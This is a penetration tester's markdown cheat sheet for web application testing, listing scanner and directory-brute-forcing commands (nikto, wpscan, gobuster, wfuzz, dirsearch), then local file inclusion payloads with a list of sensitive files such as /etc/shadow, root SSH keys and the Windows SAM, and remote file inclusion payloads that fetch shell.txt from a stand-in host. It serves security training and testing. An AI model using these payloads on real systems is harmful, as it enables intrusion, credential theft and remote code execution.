General Notes.md

Step 1: ALWAYS LOOK AT THE SOURCE CODE OF THE WEBPAGE!

Web App Scanners

Nikto:

• nikto --url

Wpscan:

• wpscan --url
• wpscan --url --enumerate ap at (All Plugins, All Themes)
• wpscan --url --enumerate u (Usernames)
• wpscan --url --enumerate v

Web Tools for Directory Scanning:

Dirb:

• dirb
• dirb

Gobuster:

• gobuster -u -w /usr/share/wordlists/
• gobuster -u -w /usr/share/wordlists/ -a Firefox (Custom Agent)
• gobuster -u -w /usr/share/wordlists/ -x .php,.txt,.html
• gobuster -u -w /usr/share/wordlists/ -x .php,.txt,.html -s "200"
• gobuster -e -u -w /usr/share/wordlists/ -x .php,.txt,.html -s "200"
• gobuster -v -e -u -w /usr/share/wordlists/ -x .php,.txt,.html -s "200"
• gobuster -v -e -u -w /usr/share/wordlists/ -x .php,.txt,.html -s "200" -o output.txt
• gobuster -s 200,204,301,302,307,403 -u 172.21.0.0 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'

Wfuzz:

• wfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ

• wfuzz -z range,0-10 --hl 97 http://testphp.vulnweb.com/listproducts.php?cat=FUZZ

• wfuzz -z file,wordlist/others/common_pass.txt -d "uname=FUZZ&pass=FUZZ" --hc 302 http://testphp.vulnweb.com/userinfo.php (Post Requests)

• wfuzz -z file,wordlist/general/common.txt -b cookie=value1 -b cookie2=value2 http://testphp.vulnweb.com/FUZZ (Fuzzing Cookies)

Dirsearch:

• dirsearch /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 172.21.0.0 -e php

Other Tools:

• Burp Suite
• OWASP Zap
• Cadaver
• SQLMap
• Joomscan

Testing for LFI:

https://www.exploit-db.com/docs/english/40992-web-app-penetration-testing---local-file-inclusion-(lfi).pdf

Examples:

http://example.com/index.php?page=etc/passwd http://example.com/index.php?page=etc/passwd%00 http://example.com/index.php?page=../../etc/passwd http://example.com/index.php?page=%252e%252e%252f http://example.com/index.php?page=....//....//etc/passwd

Interesting Files:

Linux: /etc/passwd /etc/shadow /etc/issue /etc/group /etc/hostname /etc/ssh/ssh_config /etc/ssh/sshd_config /root/.ssh/id_rsa /root/.ssh/authorized_keys /home/user/.ssh/authorized_keys /home/user/.ssh/id_rsa

Windows:

Windows: /boot.ini /autoexec.bat /windows/system32/drivers/etc/hosts /windows/repair/SAM

Testing for RFI:

http://example.com/index.php?page=http://callback.com/shell.txt http://example.com/index.php?page=http://callback.com/shell.txt%00 http://example.com/index.php?page=http:%252f%252fcallback.com%252fshell.txt

Resources

• Turning LFI to RFI: https://l.avala.mp/?p=241